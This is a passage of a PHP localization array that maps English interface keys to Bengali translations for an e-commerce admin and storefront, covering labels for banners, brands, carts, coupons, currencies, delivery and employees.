'ব্যাংকের নাম', 'Banner' => 'ব্যানার', 'Banner About Us' => 'এবাউট আস ব্যানার', 'Banner Cancellation Policy' => 'ব্যানার ক্যানসেল পলিসি', 'Banner Faq Page' => 'FAQ পৃষ্ঠা ব্যানার', 'Banner Privacy Policy' => 'প্রাইভেসি পলিসি ব্যানার', 'Banner Refund Policy' => 'রিফান্ড পলিসি ব্যানার', 'Banner Return Policy' => 'রিটার্ন পলিসি ব্যানার', 'Banner Terms Conditions' => 'ব্যানার টার্মস এন্ড কন্ডিশন', 'Banner_deleted_successfully' => 'ব্যানার সফলভাবে মুছে ফেলা হয়েছে', 'Banner_published_successfully' => 'ব্যানার সফলভাবে প্রকাশিত হয়েছে', 'Banner_unpublished_successfully' => 'ব্যানার সাফল্যের সাথে অপ্রকাশিত হয়েছে', 'Banners' => 'ব্যানার', 'Base URL of the site ex' => 'সাইটের বেস ইউআরএল', 'Basic' => 'বেসিক', 'Bazaar' => 'বাজার', 'Be careful before you turn on/off maintenance mode' => 'আপনি রক্ষণাবেক্ষণ মোড চালু/বন্ধ করার আগে সাবধানতা অবলম্বন করুন', 'Be_the_first_one_to_know_about_discounts' => 'ছাড় সম্পর্কে প্রথম জানুন', 'Beauty Health & Hair' => 'সৌন্দর্য স্বাস্থ্য এন্ড চুল', 'Becareful before change the mode' => 'মোডটি পরিবর্তন করার আগে বিকেয়ারফুল', 'Becareful for change the mode' => 'মোড পরিবর্তন করার জন্য বিকেয়ারফুল', 'Become a' => 'হয়ে একটি', 'Become a Delivery Man' => 'ডেলিভারি ম্যান হন', 'Become_a' => 'হয়ে একটি', 'Become_a_Delivery_Man' => 'ডেলিভারি ম্যান হন', 'Become_a_Seller' => 'একজন বিক্রেতা হয়ে উঠুন', 'Before delivered you need to make payment status paid!' => 'ডেলিভারি করার আগে আপনাকে অর্থ পেমেন্ট স্ট্যাটাস পেমেন্ট করা দরকার!', 'Below Average' => 'গড়ের নীচে', 'Best_Selling' => 'সেরা বিক্রয়', 'Best_Sellings' => 'সেরা বিক্রয়', 'Bicycle Shop' => 'সাইকেলের দোকান', 'Billing_Address' => 'বিলিং ঠিকানা', 'Billing_Section' => 'বিলিং ক্যাটাগরি', 'Billing_address' => 'বিলিং ঠিকানা', 'Biography' => 'জীবনী', 'Blog' => 'ব্লগ', 'Bluetooth Speaker' => 'ব্লুটুথ স্পিকার', 'Bottom' => 'নীচে', 'Branch' => 'শাখা', 'Branch_Name' => 'শাখার নাম', 'Brand' => 'ব্র্যান্ড', 'Brand Add' => 'ব্র্যান্ড অ্যাড', 'Brand Edit' => 'ব্র্যান্ড এডিট ', 'Brand List' => 'ব্র্যান্ড তালিকা', 'Brand_Logo' => 'ব্র্যান্ড লোগো', 'Brand_Name' => 'পরিচিতিমুলক নাম', 'Brand_deleted_successfully' => 'ব্র্যান্ড সফলভাবে মুছে ফেলা হয়েছে', 'Brand_update' => 'ব্র্যান্ড আপডেট', 'Brands' => 'ব্র্যান্ড', 'Business Setup' => 'ব্যবসায় সেটআপ', 'Business_Section' => 'ব্যবসায় ক্যাটাগরি', 'Business_Settings' => 'ব্যবসায়িক সেটিংস', 'Business_Setup' => 'ব্যবসায় সেটআপ', 'Business_mode' => 'ব্যবসায় মোড', 'Button_Text' => 'বোতাম টেক্সট', 'Buy_Now' => 'এখন কিনুন', 'By_Review_Rating' => 'রিভিউ রেটিং দ্বারা', 'By_clicking_sign_up_you_are_agreed_with_our ' => 'সাইন আপ ক্লিক করে আপনি আমাদের সাথে একমত হবেন', 'Cable & Converters' => 'কেবল এন্ড রূপান্তরকারী', 'Callback URI' => 'কলব্যাক URI', 'Callback_URI' => 'কলব্যাক URL', 'Callback_url' => 'কলব্যাক URL', 'Camera Accessories' => 'ক্যামেরা আনুষাঙ্গিক', 'Cancel' => 'ক্যানসেল', 'Cancel_Order' => 'অর্ডার ক্যানসেল', 'Cancel_order' => 'অর্ডার ক্যানসেল', 'Canceled' => 'ক্যানসেল', 'Canceled_Orders' => 'ক্যানসেল অর্ডার', 'Cancellation Policy' => 'ক্যান্সল্যাশন পলিসি', 'Cancellation_Policy' => 'ক্যান্সল্যাশন পলিসি', 'Cancelled' => 'ক্যানসেল', 'Captcha Failed' => 'ক্যাপচা ব্যর্থ', 'Captcha_Failed.' => 'ক্যাপচা ব্যর্থ.', 'Card' => 'কার্ড', 'Cart' => 'কার্ট', 'Cart key or ID is required!' => 'কার্ট কী বা আইডি প্রয়োজন!', 'Cart_List' => 'কার্টের তালিকা', 'Cash Payments' => 'ক্যাশ অর্থ পেমেন্ট', 'Cash Payments ' => 'ক্যাশ অর্থ পেমেন্ট', 'Cash_ Payments' => 'ক্যাশ অর্থ পেমেন্ট', 'Cash_On_Delivery' => 'ক্যাশ অন ডেলিভারি', 'Cash_Payment' => 'ক্যাশে টাকা পেমেন্ট', 'Cash_Payments' => 'ক্যাশ অর্থ পেমেন্ট', 'Cash_on_Delivery' => 'ক্যাশ অন ডেলিভারি', 'Categories' => 'ক্যাটাগরি', 'Category' => 'ক্যাটাগরি', 'Category Logo' => 'ক্যাটাগরি লোগো', 'Category deleted Successfully.' => 'ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে।', 'Category_Logo' => 'ক্যাটাগরি লোগো', 'Category_Name' => 'ক্যাটাগরি নাম', 'Category_Setup' => 'ক্যাটাগরি সেটআপ', 'Category_cost_successfully_updated' => 'ক্যাটাগরি ব্যয় সফলভাবে আপডেট হয়েছে', 'Category_deleted_Successfully.' => 'ক্যাটাগরি সফলভাবে মুছে ফেলা হয়েছে।', 'Category_tag' => 'ক্যাটাগরি ট্যাগ', 'Central Air Conditioner.' => 'কেন্দ্রীয় এয়ার কন্ডিশনার।', 'Centre Point' => 'কেন্দ্র বিন্দু', 'Change' => 'পরিবর্তন', 'Change status to paid' => 'অর্থ পেমেন্ট স্ট্যাটাস পরিবর্তন করুন', 'Charger' => 'চার্জার', 'Chat' => 'চ্যাট', 'Chat with seller' => 'বিক্রেতার সাথে চ্যাট করুন', 'Chat_with_Delivery_man' => 'ডেলিভারি ম্যানের সাথে চ্যাট করুন', 'Chat_with_Seller' => 'বিক্রেতার সাথে চ্যাট করুন', 'Chat_with_delivery' => 'ডেলিভারি সঙ্গে চ্যাট', 'Chat_with_deliveryman' => 'ডেলিভারিম্যানের সাথে চ্যাট করুন', 'Chat_with_seller' => 'বিক্রেতার সাথে চ্যাট করুন', 'Chatting List' => 'চ্যাট তালিকা', 'Chatting Page' => 'চ্যাট পৃষ্ঠা', 'Chatting_List' => 'চ্যাট তালিকা', 'Check in ' => 'চেক ইন', 'Check_Status' => 'স্ট্যাটাস চেক', 'Check_in_Accept_the_reCAPTCHA_Terms_of_Service' => 'চেক ইন করুন পরিষেবার রিক্যাপচা টার্মস গ্রহণ করুন ', 'Check_now' => 'এখন দেখ', 'Checkout' => 'চেকআউট', 'Chicken and Egg Puppy Dog Food 400g' => 'মুরগী এন্ড ডিমের কুকুরের খাবার 400 জি', 'Choice Title' => 'পছন্দ শিরোনাম', 'Choose' => 'পছন্দ করা', 'Choose Image' => 'চিত্র পছন্দ করুন', 'Choose Option' => 'বিকল্প পছন্দ করুন', 'Choose Payment Method' => 'পরিশোধের পদ্ধতি নির্বাচন করুন', 'Choose file' => 'ফাইল পছন্দ করুন', 'Choose_Address_Type' => 'ঠিকানা প্রকার পছন্দ করুন', 'Choose_Label' => 'লেবেল পছন্দ করুন', 'Choose_Logo' => 'লোগো পছন্দ করুন', 'Choose_Option' => 'বিকল্প পছন্দ করুন', 'City' => 'শহর', 'Classic' => 'ক্লাসিক', 'Classic Sneakers For Men' => 'পুরুষদের জন্য ক্লাসিক স্নিকার্স', 'Clean' => 'পরিষ্কার', 'Clean_Database' => 'পরিষ্কার ডাটাবেস', 'Clear' => 'পরিষ্কার', 'Clear_All' => 'সব পরিষ্কার করে দাও', 'Click' => 'ক্লিক', 'Click & Collect' => 'ক্লিক করুন এন্ড সংগ্রহ করুন', 'Click Continue and Download the file in device named AuthKey_ID.p8 (Store it safely and it is used for push notification)' => 'চালিয়ে ক্লিক করুন এন্ড অ্যাথকি আইডি.পি 8 নামের ডিভাইসে ফাইলটি ডাউনলোড করুন (এটি নিরাপদে সেভ করুন এন্ড এটি পুশ নোটিফিকেশনর জন্য ব্যবহৃত হয়)', 'Click Here' => 'এখানে ক্লিক করুন', 'Click Plus icon - select App IDs - click on Continue' => 'প্লাস আইকন ক্লিক করুন - অ্যাপ্লিকেশন আইডি নির্বাচন করুন - চালিয়ে যান ক্লিক করুন', 'Click to Reset' => 'পুনরায় সেট করতে ক্লিক করুন', 'Click_here' => 'এখানে ক্লিক করুন', 'Client' => 'ক্লায়েন্ট', 'Client ID' => 'ক্লায়েন্ট আইডি', 'Client OAuth Login' => 'ক্লায়েন্ট OAuth লগইন', 'Client Secret' => 'ক্লায়েন্ট সিক্রেট', 'Close' => 'বন্ধ', 'Close sidebar' => 'সাইডবার বন্ধ করুন', 'Close_Ticket' => 'টিকিট বন্ধ', 'Close_this_ticket' => 'এই টিকিট বন্ধ করুন', 'Close_ticket' => 'টিকিট বন্ধ', 'Code' => 'কোড', 'Codecanyon' => 'কোডেক্যানিয়ন', 'Color' => 'রঙ', 'Color_Variant' => 'রঙ বৈকল্পিক', 'Colors' => 'রঙ', 'Comic Book' => 'কৌতুকের বই', 'Comic book pdf' => 'কমিক বুক পিডিএফ', 'Comment' => 'মন্তব্য', 'Commission' => 'কমিশন', 'Commission Earning' => 'কমিশন উপার্জন', 'Commission Given' => 'কমিশন দেওয়া হয়েছে', 'Commission_Given' => 'কমিশন দেওয়া হয়েছে', 'Company Vehicle' => 'কোম্পানির যানবাহন', 'Company_Copyright_Text' => 'কোম্পানির কপিরাইট টেক্সট', 'Company_Information' => 'কোম্পানির তথ্য', 'Compare' => 'কম্পেয়ার করা', 'Compare_List' => 'তালিকার কম্পেয়ার করুন', 'Complaint' => 'অভিযোগ', 'Complete Registration' => 'সম্পূর্ণ নিবন্ধন', 'Complete the' => 'সম্পূর্ণ', 'Complete the add details form and press' => 'ডিটেলস যুক্ত ফর্ম এন্ড প্রেস সম্পূর্ণ করুন', 'Completed_Orders' => 'অর্ডার সম্পূর্ণ', 'Completion Rate' => 'সমাপ্তির হার', 'Computer & Office' => 'কম্পিউটার এন্ড অফিস', 'Computer Office & Security' => 'কম্পিউটার অফিস ও সুরক্ষা', 'Computer Ram' => 'কম্পিউটার র্যাম', 'Configuration_updated_successfully' => 'কনফিগারেশন সফলভাবে আপডেট হয়েছে', 'Configure' => 'সজ্জিত করা', 'Configure_your_mail_setup_first' => 'প্রথমে আপনার মেল সেটআপটি কনফিগার করুন', 'Confirm' => 'নিশ্চিত করুন', 'Confirm Email' => 'নিশ্চিত ইমেইল', 'Confirm Password' => 'পাসওয়ার্ড নিশ্চিত করুন', 'Confirm your new password' => 'আপনার নতুন পাসওয়ার্ড নিশ্চিত করুন', 'Confirm_Password' => 'পাসওয়ার্ড নিশ্চিত করুন', 'Confirmed' => 'কনফার্মড', 'Connection' => 'সংযোগ', 'Consumer electronics' => 'ভোক্তা ইলেকট্রনিক্স', 'Contact' => 'যোগাযোগ', 'Contact List' => 'যোগাযোগ তালিকা', 'Contact Number' => 'যোগাযোগের নম্বর', 'Contact Person Name' => 'যোগাযোগ ব্যক্তির নাম', 'Contact Us' => 'যোগাযোগ করুন', 'Contact View' => 'যোগাযোগ দেখুন', 'Contact info' => 'যোগাযোগের তথ্য', 'Contact_Info' => 'যোগাযোগের তথ্য', 'Contact_Number' => 'যোগাযোগের নম্বর', 'Contact_Person' => 'যোগাযোগ ব্যক্তি', 'Contact_Person_Name' => 'যোগাযোগ ব্যক্তির নাম', 'Contact_deleted_successfully' => 'সফলভাবে মুছে ফেলা যোগাযোগ', 'Continue' => 'চালিয়ে যান', 'Continue_Shopping' => 'কেনাকাটা চালিয়ে যান', 'Convert_to_Currency' => 'মুদ্রায় রূপান্তর করুন', 'Convert_your_loyalty_point_to_wallet_money.' => 'আপনার লয়াল্টি পয়েন্টকে ওয়ালেট অর্থের সাথে রূপান্তর করুন।', 'Convert_your_loyalty_points_into_wallet_money' => 'আপনার লয়াল্টি পয়েন্টগুলি ওয়ালেটের অর্থে রূপান্তর করুন', 'Cookie_Settings' => 'কুকি সেটিংস', 'Cooking Recipe' => 'রান্না রেসিপি', 'Cooking Recipe Book' => 'রান্নার রেসিপি বই', 'Copied successfully' => 'সফলভাবে অনুলিপি করা', 'Copied to the clipboard' => 'ক্লিপবোর্ডে অনুলিপি', 'Copied_to_the_clipboard' => 'ক্লিপবোর্ডে অনুলিপি', 'Copy' => 'অনুলিপি', 'Copy URI' => 'অনুলিপি', 'Copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'নীচে দায়ের করা ইনপুটটিতে সাইট কী এন্ড সিক্রেট কী পেস্টটি অনুলিপি করুন এন্ড সেভ করুন।', 'Copyright' => 'কপিরাইট', 'Country' => 'দেশ', 'Country Fair' => 'দেশ ন্যায্য', 'Coupon' => 'কুপন', 'Coupon Add' => 'কুপন অ্যাড', 'Coupon Discount' => 'কুপন ছাড়', 'Coupon Edit' => 'কুপন এডিট ', 'Coupon code' => 'কুপন কোড', 'Coupon_Discount' => 'কুপন ছাড়', 'Coupon_Discount_Amount' => 'কুপন ছাড়ের পরিমাণ', 'Coupon_added_successfully' => 'কুপন সফলভাবে যোগ করেছে', 'Coupon_discount' => 'কুপন ছাড়', 'Coupon_status_updated' => 'কুপন স্ট্যাটাস আপডেট হয়েছে', 'Coupon_updated_successfully' => 'কুপন সফলভাবে আপডেট হয়েছে', 'Crave' => 'অভ্যাস', 'Create' => 'ক্রিয়েট ', 'Create App' => 'অ্যাপ্লিকেশন তৈরি করুন', 'Create Role' => 'ভূমিকা তৈরি করুন', 'Create credentials' => 'ক্রেডেনটিয়াল তৈরি করুন', 'Create_your_own_business' => 'আপনার নিজের ব্যবসা তৈরি করুন', 'Create_your_own_store.' => 'আপনার নিজের স্টোর তৈরি করুন।', 'Credential Setup' => 'ক্রেডেনটিয়াল সেটআপ', 'Credentials SetUp' => 'ক্রেডেনটিয়াল সেটআপ', 'Credentials_SetUp_page' => 'ক্রেডেনটিয়াল সেটআপ পৃষ্ঠা', 'Credit' => 'ক্রেডিট', 'Credit / Debit card ( Stripe )' => 'ক্রেডিট / ডেবিট কার্ড (স্ট্রাইপ)', 'Currency' => 'মুদ্রা', 'Currency Code' => 'মুদ্রা কোড', 'Currency Name' => 'মুদ্রার নাম', 'Currency Symbol' => 'মুদ্রার প্রতীক', 'Currency Symbol Position' => 'মুদ্রা প্রতীক পজিশন', 'Currency changed to' => 'মুদ্রা পরিবর্তিত হয়েছে', 'Currency removed successfully!' => 'মুদ্রা সফলভাবে সরানো!', 'Currency status successfully changed.' => 'মুদ্রার স্ট্যাটাস সফলভাবে পরিবর্তিত হয়েছে।', 'Currency সফলভাবে আপডেট করা হয়েছে৷!' => 'মুদ্রা সফলভাবে আপডেট হয়েছে!', 'Currency_Setup' => 'মুদ্রা সেটআপ', 'Current Stock' => 'বর্তমান ফান্ড', 'Current Stock Amount' => 'বর্তমান স্টক পরিমাণ', 'Current_Stock' => 'বর্তমান স্টক', 'Current_Stock_Amount' => 'বর্তমান স্টক পরিমাণ', 'Custom Date' => 'কাস্টম তারিখ', 'Custom_Date' => 'কাস্টম তারিখ', 'Customeer_Added_Successfully' => 'কাস্টোমার সফলভাবে যুক্ত হয়েছে', 'Customer' => 'ক্রেতা', 'Customer Details' => 'কাস্টমার ডিটেলস', 'Customer ID' => 'গ্রাহক আইডি', 'Customer List' => 'গ্রাহক তালিকা', 'Customer Message' => 'গ্রাহক মেসেজ', 'Customer Name' => 'ক্রেতার নাম', 'Customer details' => 'কাস্টমার ডিটেলস', 'Customer_Info' => 'গ্রাহক তথ্য', 'Customer_List' => 'গ্রাহক তালিকা', 'Customer_Name' => 'ক্রেতার নাম', 'Customer_Verify' => 'গ্রাহক যাচাই করুন', 'Customer_information' => 'গ্রাহক তথ্য', 'Customer_list' => 'গ্রাহক তালিকা', 'Customer_not_found' => 'গ্রাহক পাওয়া যায় নি', 'Customer_not_found_or_Account_has_been_suspended' => 'গ্রাহক পাওয়া যায় নি বা অ্যাকাউন্ট সাসপেন্ড করা হয়েছে', 'Customer_review' => 'গ্রাহক রিভিউ', 'Customers' => 'গ্রাহকরা', 'Customers_will_not_be_able_to_order_or_purchase_from_his_shop' => 'গ্রাহকরা তার দোকান থেকে অর্ডার বা কিনতে এনাবল হবেন না', 'DB_CONNECTION' => 'ডিবি সংযোগ', 'DB_DATABASE' => 'ডিবি ডাটাবেস', 'DB_HOST' => 'ডিবি হোস্ট', 'DB_PASSWORD' => 'ডিবি পাসওয়ার্ড', 'DB_PORT' => 'ডিবি পোর্ট', 'DB_USERNAME' => 'ডিবি ব্যবহারকারীর নাম', 'DB_clean' => 'ডিবি ক্লিন', 'DB_connection' => 'ডিবি সংযোগ', 'DB_database' => 'ডিবি ডাটাবেস', 'DB_host' => 'ডিবি হোস্ট', 'DB_password' => 'ডিবি পাসওয়ার্ড', 'DB_port' => 'ডিবি পোর্ট', 'DB_username' => 'ডিবি ব্যবহারকারীর নাম', 'DELIVERY' => 'ডেলিভারি', 'DESC' => 'ডেস্ক', 'Dashboard' => 'ড্যাশবোর্ড', 'Data_updated_successfully!' => 'সাফল্যের সাথে ডেটা আপডেট হয়েছে!', 'Date' => 'তারিখ', 'Date Submitted' => 'ডেট জমা', 'Days' => 'দিন', 'Deal Of The Day' => 'ডিল অফ দি ডে', 'Deal Page' => 'ডিল পৃষ্ঠা', 'Deal Product' => 'ডিল পণ্য', 'Deal Update' => 'ডিল আপডেট', 'Deal of the Day' => 'ডিল অফ দি ডে', 'Deal of the day form' => 'ফর্ম ডিল অফ দি ডে', 'Debit' => 'ডেবিট', 'Default' => 'ডিফল্ট', 'Default Sales Commission' => 'ডিফল্ট বিক্রয় কমিশন', 'Default_Method_updated_failed.' => 'ডিফল্ট পদ্ধতি আপডেট ব্যর্থ হয়েছে।', 'Default_Method_updated_successfully' => 'ডিফল্ট পদ্ধতি সফলভাবে আপডেট হয়েছে', 'Delete' => 'মুছে ফেলুন', 'Delete_My_Account' => 'আমার একাউন্ট মুছে দিন', 'Delivered' => 'ডেলিভারি', 'Delivered_By' => 'দ্বারা ডেলিভারি', 'Delivered_Orders' => 'অর্ডার ডেলিভারি', 'Delivery' => 'ডেলিভারি', 'Delivery status updated to' => 'ডেলিভারি স্ট্যাটাস আপডেট', 'Delivery-Man' => 'ডেলিভারি-ম্যান', 'Delivery-man removed!' => 'ডেলিভারি-ম্যান সরানো!', 'Delivery_Address' => 'সরবরাহের ঠিকানা', 'Delivery_Charge' => 'ডেলিভারি চার্জ', 'Delivery_Information_Details' => 'ডেলিভারি তথ্য ডিটেলস', 'Delivery_Man' => 'ডেলিভারি-ম্যান', 'Delivery_Man_Info' => 'ডেলিভারি ম্যান তথ্য', 'Delivery_Restriction' => 'ডেলিভারি সীমাবদ্ধতা', 'Delivery_man' => 'ডেলিভারি-ম্যান', 'Delivery_unavailable_for_this_country' => 'এই দেশের জন্য ডেলিভারি আনএভেইল্যাবল', 'Delivery_unavailable_for_this_zip_code_area' => 'এই জিপ কোড অঞ্চলের জন্য ডেলিভারি আনএভেইল্যাবল', 'Delivery_unavailable_in_this_country' => 'এই দেশে ডেলিভারি আনএভেইল্যাবল', 'Deliveryman List' => 'ডেলিভারিম্যান তালিকা', 'Deliveryman_Review' => 'ডেলিভারিকারী রিভিউ', 'Deluxe Online' => 'অনলাইন ডিলাক্স', 'Deluxe Online Deluxe' => 'ডিলাক্স অনলাইন ডিলাক্স', 'Deluxe Online Deluxe Online' => 'ডিলাক্স অনলাইন ডিলাক্স অনলাইন', 'Denied' => 'ডিনাইড', 'Deny' => 'ডিনাইড', 'Description' => 'বর্ণনা', 'Details' => 'ডিটেলস', 'Dev' => 'দেব', 'Digital Files' => 'ডিজিটাল ফাইল', 'Digital Payments' => 'ডিজিটাল পেমেন্ট', 'Digital Product' => 'ডিজিটাল পণ্য', 'Digital Product House' => 'ডিজিটাল পণ্য বাড়ি', 'Digital Product on/off' => 'ডিজিটাল পণ্য চালু/বন্ধ', 'Digital Seller' => 'ডিজিটাল বিক্রেতা', 'Digital_Payment' => 'ডিজিটাল পেমেন্ট', 'Digital_Payments' => 'ডিজিটাল পেমেন্ট', 'Discount' => 'ছাড়', 'Discount Given' => 'ছাড় দেওয়া', 'Discount can not be more or equal to the price!' => 'ছাড়ের চেয়ে বেশি বা সমান হতে পারে না!', 'Discount on Purchase' => 'ক্রয় ছাড়', 'Discount_Amount' => 'হ্রাসকৃত মুল্য', 'Discount_Given' => 'ছাড় দেওয়া', 'Discount_Type' => 'ছাড়ের ধরণ', 'Discount_on_Purchase' => 'ক্রয় ছাড়', 'Discount_on_product' => 'পণ্য ছাড়', 'Discounted_Amount' => 'ছাড়ের পরিমাণ', 'Discounted_Products' => 'ছাড়যুক্ত পণ্য', 'Do you want to delete this ' => 'আপনি কি এটি মুছতে চান?', 'Do you want to logout' => 'আপনি কি লগআউট করতে চান?', 'Do_not_Logout' => 'লগআউট করবেন না', 'Do_not_Miss_Todays_Deal' => 'আজকের ডিল মিস করবেন না', 'Do_not_delete' => 'মুছে ফেলবেন না', 'Do_you_want_to_logout' => 'আপনি কি লগআউট করতে চান?', 'Doe' => 'দো', 'Don t Delete' => 'মুছবেন না', 'Don`t_have_the_template_ ' => 'টেমপ্লেট নেই', 'Dont_Miss_Todays_Deal' => 'আজকের ডিল মিস করবেন না', 'Dont_Miss_the_Chance' => 'সুযোগটি মিস করবেন না', 'Dont_have_account' => 'অ্যাকাউন্ট নেই', 'Don’t_Miss_the_Chance' => 'চান্স মিস করবেন না', 'Don’t_have_account' => 'অ্যাকাউন্ট নেই?', 'Double Fan' => 'ডাবল ফ্যান', 'Download' => 'ডাউনলোড', 'Download Format' => 'ফর্ম্যাট ডাউনলোড করুন', 'Download Generate Sitemap' => 'ডাউনলোড সাইটম্যাপ জেনারেট করুন', 'Download PDF' => 'পিডিএফ ডাউনলোড করুন', 'Download the file in device named' => 'নামযুক্ত ডিভাইসে ফাইলটি ডাউনলোড করুন', 'Download the format file and fill it with proper data' => 'ফর্ম্যাট ফাইলটি ডাউনলোড করুন এন্ড এটি যথাযথ ডেটা দিয়ে পূরণ করুন', 'Download the format file and fill it with proper data.' => 'ফর্ম্যাট ফাইলটি ডাউনলোড করুন এন্ড এটি যথাযথ ডেটা দিয়ে পূরণ করুন।', 'Dress' => 'পোষাক', 'Driver' => 'ড্রাইভার', 'Due_Amount' => 'বাকি টাকা', 'Duration' => 'সময়কাল', 'Dynamova' => 'ডায়নামোভা', 'E- tech' => 'ই- প্রযুক্তি', 'EGP_currency_is_required' => 'ইজিপি মুদ্রা প্রয়োজন', 'EX' => 'এক্সাম্পল', 'EX of SMS provider s template : your OTP is XXXX here please check' => 'এক্সাম্পল এসএমএস সরবরাহকারীর টেম্পলেট: আপনার ওটিপি xxxx এখানে দয়া করে চেক করুন', 'EX of SMS provider s template = your OTP is XXXX here please check' => 'এক্সাম্পল এসএমএস সরবরাহকারীর টেম্পলেট=> আপনার ওটিপি xxxx এখানে দয়া করে চেক করুন', 'EX= 123' => 'এক্সাম্পল=> 123', 'EX_of_SMS_providers_template_= _your_OTP_is_XXXX_here_please_check' => 'এক্সাম্পল এসএমএস সরবরাহকারী টেম্পলেট=> আপনার ওটিপি xxxx এখানে দয়া করে চেক করুন', 'Earn From Order' => 'অর্ডার থেকে উপার্জন', 'Earn From Shipping' => 'শিপিং থেকে উপার্জন', 'Earn_From_Order' => 'অর্ডার থেকে উপার্জন', 'Earn_From_Shipping' => 'শিপিং থেকে উপার্জন', 'Earn_as_Delivery_Man' => 'ডেলিভারি ম্যান একাউন্টে উপার্জন করুন', 'Earn_money _o_your_wallet_by_completingthe_offer_&_challenged' => 'অফারটি সম্পূর্ণ করে এন্ড চ্যালেঞ্জ করে আপনার ওয়ালেট টি অর্থ উপার্জন করুন', 'Earn_money_to_your_wallet_by_completing_the_offer_&_challenged' => 'অফারটি সম্পূর্ণ করে আপনার ওয়ালেট অর্থ উপার্জন করুন', 'Earning' => 'উপার্জন', 'Earning Report' => 'উপার্জন রিপোর্ট', 'Earning Statistics' => 'পরিসংখ্যান উপার্জন', 'Earning statistics for business analytics' => 'ব্যবসায় বিশ্লেষণের জন্য পরিসংখ্যান উপার্জন', 'Earning_From_Shipping' => 'শিপিং থেকে উপার্জন', 'Earning_Report' => 'উপার্জন রিপোর্ট', 'Earning_Reports' => 'রিপোর্ট উপার্জন', 'Earning_Statistics' => 'পরিসংখ্যান উপার্জন', 'Earning_statistics' => 'উপার্জন পরিসংখ্যান', 'Easy Electronics' => 'সহজ ইলেকট্রনিক্স', 'Ecommerce' => 'ইকমার্স', 'Edit' => 'এডিট ', 'Edit ব্যাংক তথ্য' => 'ব্যাংক তথ্য এডিট করুন', 'Edit Modal Help Topic' => 'মডেল সহায়তা বিষয় এডিট করুন', 'Edit Role' => 'ভূমিকা এডিট ', 'Edit Shipping' => 'শিপিং এডিট করুন', 'Edit Shop Info' => 'শপ তথ্য এডিট করুন', 'Edit_Bank_Info' => 'ব্যাংক তথ্য এডিট করুন', 'Edit_Bank_info' => 'ব্যাংক তথ্য এডিট করুন', 'Edit_My_Profile' => 'আমার প্রোফাইল এডিট করুন', 'Edit_Personal_Details' => 'ব্যক্তিগত ডিটেলস এডিট করুন', 'Edit_Profile' => 'প্রোফাইল এডিট ', 'Edit_Shop_Info' => 'শপ তথ্য এডিট করুন', 'Electron Pro' => 'ইলেক্ট্রন প্রো', 'Electronic Agile' => 'বৈদ্যুতিন চতুর', 'Electronics' => 'ইলেকট্রনিক্স', 'Email' => 'ইমেল', 'Email Verification' => 'ইমেইলের সত্যতা যাচাই', 'Email_Verification' => 'ইমেইলের সত্যতা যাচাই', 'Emergency_Contact' => 'জরুরী যোগাযোগ', 'Employee' => 'কর্মচারী', 'Employee Add' => 'কর্মচারী অ্যাড', 'Employee Edit' => 'কর্মচারী এডিট ', 'Employee List' => 'কর্মচারী তালিকা', 'Employee Roles' => 'কর্মচারী ভূমিকা', 'Employee_Role_Setup' => 'কর্মচারী ভূমিকা সেটআপ', 'Employee_Section' => 'কর্মচারী ক্যাটাগরি', 'Employee_Update' => 'কর্মচারী আপডেট', 'Employees' => 'কর্মচারী', 'Empty' => 'খালি', 'Encryption' => 'এনক্রিপশন', 'End Date' => 'শেষ তারিখ', 'End_Date' => 'শেষ তারিখ', 'Enjoy New experience' => 'নতুন অভিজ্ঞতা উপভোগ করুন', 'Enjoy_New_experience' => 'নতুন অভিজ্ঞতা উপভোগ করুন', 'Enter Social Media Link' => 'সোশ্যাল মিডিয়া লিঙ্ক প্রদান করুন', 'Enter captcha value' => 'ক্যাপচা মান লিখুন', 'Enter choice values' => 'পছন্দ মান লিখুন', 'Enter currency Name' => 'মুদ্রার নাম প্রদান করুন', 'Enter currency code' => 'মুদ্রা কোড প্রদান করুন', 'Enter currency exchange rate' => 'মুদ্রা বিনিময় হার প্রদান করুন', 'Enter currency symbol' => 'মুদ্রা প্রতীক প্রদান করুন', 'Enter new email address' => 'নতুন ইমেল ঠিকানা লিখুন', 'Enter new password' => 'নতুন পাসওয়ার্ড লিখুন', 'Enter recaptcha value' => 'Recaptcha মান লিখুন', 'Enter your email address' => 'আপনার ই - মেইল ঠিকানা লিখুন', 'Enter_Attribute_Name' => 'এট্রিবিউট নাম লিখুন', 'Enter_Your_City' => 'আপনার শহর প্রদান করুন', 'Enter_Your_zip_code' => 'আপনার জিপ কোড দিন', 'Enter_banner_sub_title' => 'ব্যানার সাব শিরোনাম প্রদান করান', 'Enter_banner_title' => 'ব্যানার শিরোনাম প্রদান করান', 'Enter_button_text' => 'বোতাম টেক্সট লিখুন', 'Enter_captcha_value' => 'ক্যাপচা মান লিখুন', 'Enter_email' => 'ইমেইল প্রদান করুন', 'Enter_email_address_or_phone_number' => 'ইমেল ঠিকানা বা ফোন নম্বর লিখুন', 'Enter_email_number' => 'ইমেল নম্বর লিখুন', 'Enter_email_or_phone_number' => 'ইমেল বা ফোন নম্বর লিখুন', 'Enter_password' => 'পাসওয়ার্ড লিখুন', 'Enter_phone_number' => 'ফোন নম্বর লিখুন', 'Enter_url' => 'ইউআরএল দিন', 'Enter_your_email' => 'আপনার ইমেইল প্রদান করুন', 'Enter_your_order_ID_& _phone_to_get_delivery_updates' => 'ডেলিভারি আপডেট পেতে আপনার অর্ডার আইডি এন্ড ফোন প্রদান করুন', 'Enter_your_order_ID_&_phone ' => 'আপনার অর্ডার আইডি এন্ড ফোন লিখুন', 'Enter_your_order_ID_&_phone_to_get_delivery_updates' => 'ডেলিভারি আপডেট পেতে আপনার অর্ডার আইডি এন্ড ফোন প্রদান করান', 'Entries' => 'Entries', 'Environment_Information' => 'পরিবেশ তথ্য', 'Environment_Setup' => 'পরিবেশ সেটআপ', 'Eratmart' => 'ইরাতমার্ট', 'Error' => 'ত্রুটি', 'Error Something went wrong' => 'এরর, কিছু ভুল হয়েছে', 'Estimated Delivary Date' => 'আনুমানিক ডেলিভারি তারিখ', 'Ex' => 'এক্সাম্পল', 'Ex : 017********' => 'এক্সাম্পল: 017 ********', 'Ex : ex@example.com' => 'এক্সাম্পল: ex@example.com', 'Ex : password' => 'এক্সাম্পল: পাসওয়ার্ড', 'Ex = DH-23434-LS' => 'এক্সাম্পল=> ডিএইচ -23434-এলএস', 'Ex: 01xxxxxxxxx' => 'এক্সাম্পল: 01xxxxxxxxxx', 'Ex: 100' => 'এক্সাম্পল: 100', 'Ex: 500' => 'এক্সাম্পল: 500', 'Ex: 